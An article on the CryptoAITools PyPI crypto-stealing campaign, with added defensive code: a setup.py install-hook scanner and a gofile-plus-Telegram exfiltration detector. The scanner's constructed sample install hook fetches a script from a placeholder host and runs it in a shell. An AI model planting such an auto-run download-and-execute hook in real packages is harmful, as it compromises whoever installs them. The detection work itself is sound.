Checkmarx’s research team has uncovered a new crypto-stealing malware campaign on the Python Package Index (PyPI). The malicious packages impersonate cryptocurrency trading tools in order to steal sensitive data and drain victims’ cryptocurrency wallets.
The findings show that a malicious package named “CryptoAITools” was uploaded to both PyPI and GitHub, posing as a legitimate cryptocurrency trading tool.
The package presented a fake graphical user interface (GUI) to distract victims while the malware ran in the background. It also executed automatically on installation and targeted both Windows and macOS.
“The CryptoAITools malware uses a sophisticated multi-step infection process, using a fake website to deliver its secondary payloads. After the initial infection via the PyPI package, the malware executes separate scripts for macOS and Windows systems.
“These scripts are responsible for downloading additional malicious components from the fake site,” the research team wrote.
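The self-activating installer described above is the part a defender can check before the package ever runs: on `pip install` of a source distribution, setuptools executes setup.py, and a package that overrides the `install` command can run arbitrary code there, branch on the operating system, and fetch a second stage. The following static triage check is an added example written for this page; it is not Checkmarx’s code and not the CryptoAITools package. The two sample setup.py texts are constructed for illustration (the `.invalid` URLs are placeholders), and the `scan_sdist` helper assumes a plain `.tar.gz` sdist laid out as `<pkg>-<ver>/setup.py`.

```python
"""
Added example: a static triage check for setup.py install hooks.
Not Checkmarx's code and not the CryptoAITools package; the sample
setup.py texts below are constructed (placeholder .invalid URLs).
The check models the behaviour the report describes: code that runs
automatically on `pip install` via a setuptools command override,
branches on the OS, and fetches or spawns something.
"""
import ast
import tarfile
from dataclasses import dataclass, field

HOOK_COMMANDS = {"install", "develop", "egg_info", "build_py"}
SUSPICIOUS_CALLS = {
    "os.system", "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "urllib.request.urlopen", "requests.get",
    "exec", "eval", "base64.b64decode",
}
PLATFORM_MARKERS = {"sys.platform", "platform.system", "os.name"}


@dataclass
class Finding:
    hook_classes: list = field(default_factory=list)      # classes wired in via cmdclass
    suspicious_calls: list = field(default_factory=list)  # dotted call names found inside them
    platform_branching: bool = False                      # OS checks inside the hooks

    @property
    def risky(self) -> bool:
        # An install hook alone is common (compiled extensions, data files);
        # a hook that also branches on the OS or spawns/fetches warrants a look.
        return bool(self.hook_classes) and (bool(self.suspicious_calls) or self.platform_branching)


def _dotted(node: ast.AST) -> str:
    """Render a Name/Attribute chain such as `subprocess.run` as a dotted string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _cmdclass_targets(tree: ast.Module) -> set:
    """Class names passed to setup(cmdclass={'install': Cls, ...})."""
    targets = set()
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and _dotted(node.func).split(".")[-1] == "setup"):
            continue
        for kw in node.keywords:
            if kw.arg != "cmdclass" or not isinstance(kw.value, ast.Dict):
                continue
            for key, val in zip(kw.value.keys, kw.value.values):
                if isinstance(key, ast.Constant) and key.value in HOOK_COMMANDS and isinstance(val, ast.Name):
                    targets.add(val.id)
    return targets


def analyze_setup_py(source: str) -> Finding:
    """Parse setup.py text and report what its install-time hooks do."""
    tree = ast.parse(source)
    finding = Finding(hook_classes=sorted(_cmdclass_targets(tree)))
    calls = set()
    for cls in ast.walk(tree):
        if not (isinstance(cls, ast.ClassDef) and cls.name in finding.hook_classes):
            continue
        for node in ast.walk(cls):
            if isinstance(node, ast.Call) and _dotted(node.func) in SUSPICIOUS_CALLS:
                calls.add(_dotted(node.func))
            if _dotted(node) in PLATFORM_MARKERS:
                finding.platform_branching = True
    finding.suspicious_calls = sorted(calls)
    return finding


def scan_sdist(path: str) -> Finding:
    """Run the check on a downloaded .tar.gz sdist (pip download --no-binary :all: <pkg>)."""
    with tarfile.open(path) as tar:
        for member in tar.getmembers():
            if member.name.count("/") == 1 and member.name.endswith("/setup.py"):
                return analyze_setup_py(tar.extractfile(member).read().decode())
    return Finding()  # pyproject-only sdists have no setup.py; inspect the build backend instead


# Constructed sample: an ordinary package with no install hook.
BENIGN_SETUP = """
from setuptools import setup
setup(name="tidy-tool", version="1.0", packages=["tidy_tool"])
"""

# Constructed sample: the shape of a self-activating package, with placeholder URLs.
SUSPICIOUS_SETUP = """
import os, sys, subprocess, urllib.request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        if sys.platform == "darwin":
            stage2 = urllib.request.urlopen("https://example.invalid/m.sh").read().decode()
            subprocess.run(["/bin/sh", "-c", stage2])
        elif os.name == "nt":
            os.system("powershell -File win_stage2.ps1")

setup(name="not-a-real-package", version="0.1", cmdclass={"install": PostInstall})
"""

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    print(scan_sdist(target) if target else analyze_setup_py(SUSPICIOUS_SETUP))
```

Run it against an sdist fetched with `pip download --no-binary :all: <package>` before installing; a `risky=True` finding means setup.py wires a class into `cmdclass` and that class spawns a process, fetches a URL, or branches on the OS. The check is deliberately syntactic: it will miss hooks that assign the class through an intermediate variable or that hide their calls behind `exec` of decoded strings (which is why `exec`, `eval` and `base64.b64decode` are in the list), and it says nothing about wheels, which do not run setup.py at all.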
Checkmarx researcher Yehuda Gelb said in an analysis published earlier this month that the attacker targeted users of Atomic, Trust Wallet, MetaMask, Ronin, TronLink, Exodus and other well-known cryptocurrency wallets.
“Presenting themselves as tools for mining mnemonic phrases and decrypting wallet data, these packages appeared to offer valuable functionality for cryptocurrency users involved in recovery or wallet management.”
The CryptoAITools malware also ran an extensive data-theft operation, harvesting browser data such as saved passwords and browsing history. On macOS, it additionally collected data from the Apple Notes and Stickies applications.
The malware began by harvesting data stored in the user’s home folder. The exfiltration script then handles each collected file in turn and uploads it to gofile.io through the service’s API.
The malware then sends the resulting download link to the attacker through a Telegram bot. Separately, the attacker used a range of social-engineering tactics to lure potential victims.
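Both destinations in that exfiltration chain are legitimate public services, so blocking gofile.io or api.telegram.org outright is disruptive and easy to evade; the usable signal is the correlation, one process uploading to gofile.io and shortly afterwards calling the Telegram Bot API with a bot token in the URL path. The detection below is an added example written for this page, not Checkmarx’s or the malware’s code. The log lines are constructed to resemble a JSON egress-proxy log; the field names (`ts`, `host`, `proc`, `pid`, `method`, `url`) are an assumption, and the gofile upload paths mirror its public API only as far as the sample needs.

```python
"""
Added example: flag the exfiltration pattern (gofile.io upload followed by a
Telegram Bot API call from the same process) in egress logs. Written for this
page; not Checkmarx's or the malware's code. SAMPLE_LOG is constructed and its
field names are an assumption about the proxy's log format.
"""
import json
import re
from collections import defaultdict
from urllib.parse import urlparse

# Telegram bot tokens are "<bot id digits>:<35-char secret>" and sit in the URL path.
BOT_TOKEN_RE = re.compile(r"/bot(\d{8,10}:[A-Za-z0-9_-]{35})/")
UPLOAD_HOST_RE = re.compile(r"(^|\.)gofile\.io$")

# Constructed sample log (JSON lines). win-01/python.exe shows the chain;
# the other lines are benign lookalikes that must not alert.
SAMPLE_LOG = """
{"ts":"2024-10-29T10:01:02Z","host":"win-01","proc":"python.exe","pid":4412,"method":"GET","url":"https://api.gofile.io/servers"}
{"ts":"2024-10-29T10:01:03Z","host":"win-01","proc":"python.exe","pid":4412,"method":"POST","url":"https://store1.gofile.io/contents/uploadfile","bytes_out":5242880}
{"ts":"2024-10-29T10:01:05Z","host":"win-01","proc":"python.exe","pid":4412,"method":"POST","url":"https://api.telegram.org/bot1234567890:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghi/sendMessage"}
{"ts":"2024-10-29T10:02:00Z","host":"mac-07","proc":"Safari","pid":911,"method":"GET","url":"https://core.telegram.org/bots/api"}
{"ts":"2024-10-29T10:03:00Z","host":"win-02","proc":"chrome.exe","pid":7001,"method":"GET","url":"https://gofile.io/d/abc123"}
"""


def extract_bot_token(url: str):
    """Return the bot token embedded in a Telegram Bot API URL, or None."""
    m = BOT_TOKEN_RE.search(url)
    return m.group(1) if m else None


def detect_exfil(log_text: str) -> list:
    """Correlate per (host, process, pid): a gofile upload followed by a Telegram bot call."""
    state = defaultdict(lambda: {"upload": None, "telegram": None})
    for line in log_text.strip().splitlines():
        ev = json.loads(line)
        hostname = urlparse(ev["url"]).hostname or ""
        key = (ev["host"], ev["proc"], ev["pid"])
        if ev["method"] == "POST" and UPLOAD_HOST_RE.search(hostname):
            state[key]["upload"] = state[key]["upload"] or ev   # keep the first upload seen
        elif hostname == "api.telegram.org" and extract_bot_token(ev["url"]):
            state[key]["telegram"] = ev
    alerts = []
    for (host, proc, pid), s in state.items():
        if s["upload"] and s["telegram"] and s["upload"]["ts"] <= s["telegram"]["ts"]:
            alerts.append({
                "host": host, "proc": proc, "pid": pid,
                "upload_url": s["upload"]["url"],
                "telegram_url": s["telegram"]["url"],
                # the token identifies the attacker's bot; report it to Telegram for takedown
                "bot_token": extract_bot_token(s["telegram"]["url"]),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_exfil(SAMPLE_LOG):
        print(alert)
```

A browser downloading from gofile.io (GET) or someone reading the Bot API docs does not trip the rule; only a POST upload and a tokenised bot call from the same process, in that order, do. Timestamps are compared as ISO-8601 strings, which is only safe because the sample is all in UTC with a fixed format; for a real pipeline parse them. Keeping the extracted token in the alert is deliberate: it is the one artefact that lets the responder ask Telegram to disable the bot and so cut the attacker off from every other victim using the same channel.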
“Our further investigation into this campaign revealed that the attacker used multiple infection vectors and social engineering tactics,” the team noted. “The attack is not limited to the malicious Python package on PyPI, but extends to other platforms and methods.”
The CryptoAITools campaign has serious consequences for its victims and the broader cryptocurrency community: immediate financial loss from drained wallets, plus long-term identity-theft and privacy risks from the stolen browser and personal data.